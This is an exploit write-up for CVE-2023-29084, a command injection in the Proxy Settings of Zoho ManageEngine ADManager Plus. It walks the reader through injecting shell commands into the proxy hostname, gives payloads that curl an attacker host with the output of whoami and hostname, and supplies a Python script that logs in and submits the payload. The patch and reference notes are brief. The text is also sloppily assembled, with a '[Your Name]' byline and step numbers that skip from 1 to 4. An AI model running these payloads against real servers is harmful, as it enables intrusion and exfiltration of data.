CVE-2023-29084 - Exploiting Zoho ManageEngine ADManager Plus Command Injection (with Code Example and Exploit Details)
*By [Your Name], June 2024*
What is CVE-2023-29084?
CVE-2023-29084 is a critical vulnerability found in Zoho ManageEngine ADManager Plus, a popular Active Directory management and reporting solution. Versions up to 718 are affected. Through this flaw, an *authenticated* user can execute arbitrary operating system commands on the server, specifically via the product’s Proxy Settings function.
The vulnerability is classified as a command injection, which means attackers can run their own commands on the server with the privileges of the ADManager Plus process.
Why Does This Matter?
ADManager Plus is often deployed in corporate networks with high privileges, meaning that exploitation can lead to data theft, privilege escalation, or a complete network compromise.
How the Exploit Works
Zoho ManageEngine ADManager Plus allows admin users to configure proxy settings inside the application. Unfortunately, user input here isn’t properly sanitized.
When configuring Proxy settings (like hostname or credentials), ADManager Plus saves the values and may call out to system binaries (such as curl, wget, or internal Java classes using the supplied inputs directly), without enough checks. If an attacker injects command separators (; or &&), everything after these is treated as a command by the underlying operating system.
1. Log into ADManager Plus
Log in with any valid account with permission to change Profile/Proxy Settings. (Some non-admin users may also have the rights, depending on deployment.)
Suppose the server hostname is supposed to be proxy.example.com. Instead, enter a value like
proxy.example.com; whoami > /tmp/hacked
Or, for more impact
proxy.example.com; bash -c "curl http://<your-attacker-IP>:808/$(hostname)";
4. Save and Test Connection
Click "Save" and then use "Test Connection," or just wait for the server to use the proxy settings. Your payload will execute.
Example PoC Payload
proxyhost; curl http://attacker.com/$(whoami)
If your command includes outbound network requests (like curl or wget), your attacker-controlled server will receive a connection, proving command execution.
Here’s a quick PoC in Python using requests to automate submitting a malicious Proxy Hostname
import requests
# Set these variables
URL = "https://target-admanagerplus:808";
USERNAME = "victim"
PASSWORD = "password"
session = requests.Session()
# 1. Log in
login_data = {
'j_username': USERNAME,
'j_password': PASSWORD
}
r = session.post(f"{URL}/j_security_check", data=login_data, verify=False)
if "logout" not in r.text.lower():
print("[-] Login failed")
exit()
print("[+] Logged in")
# 2. Inject payload through proxy settings
payload = 'proxy.example.com; curl http://attacker.com/$(whoami)'
data = {
'proxyHost': payload,
'proxyPort': '808',
'proxyUser': '',
'proxyPassword': ''
}
r = session.post(f"{URL}/html/UpdateProxyDetails", data=data, verify=False)
print("[+] Payload sent")
*You’ll need to update endpoint and fields as per your ADManager Plus version and capture cookies/tokens as appropriate.*
Responsible Disclosure and Patch
Zoho released a patch in March 2023. Versions after 718 (such as 7181 and above) fix the input validation in proxy settings. Always update to the latest version.
- Patch announcement: Zoho advisory
- NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2023-29084
References
- Zoho Security Advisory
- NVD CVE-2023-29084
- ManageEngine ADManager Plus Release Notes
In Summary
CVE-2023-29084 gives authenticated users a simple way to run commands as the ADManager Plus server user, using the app’s Proxy Settings. All users of vulnerable versions should update and audit their systems to make sure attackers haven’t slipped in.
> *Stay safe: Keep critical software up to date and never ignore authenticated user input validation!*
Timeline
Published on: 04/13/2023 19:15:00 UTC
Last modified on: 04/21/2023 13:19:00 UTC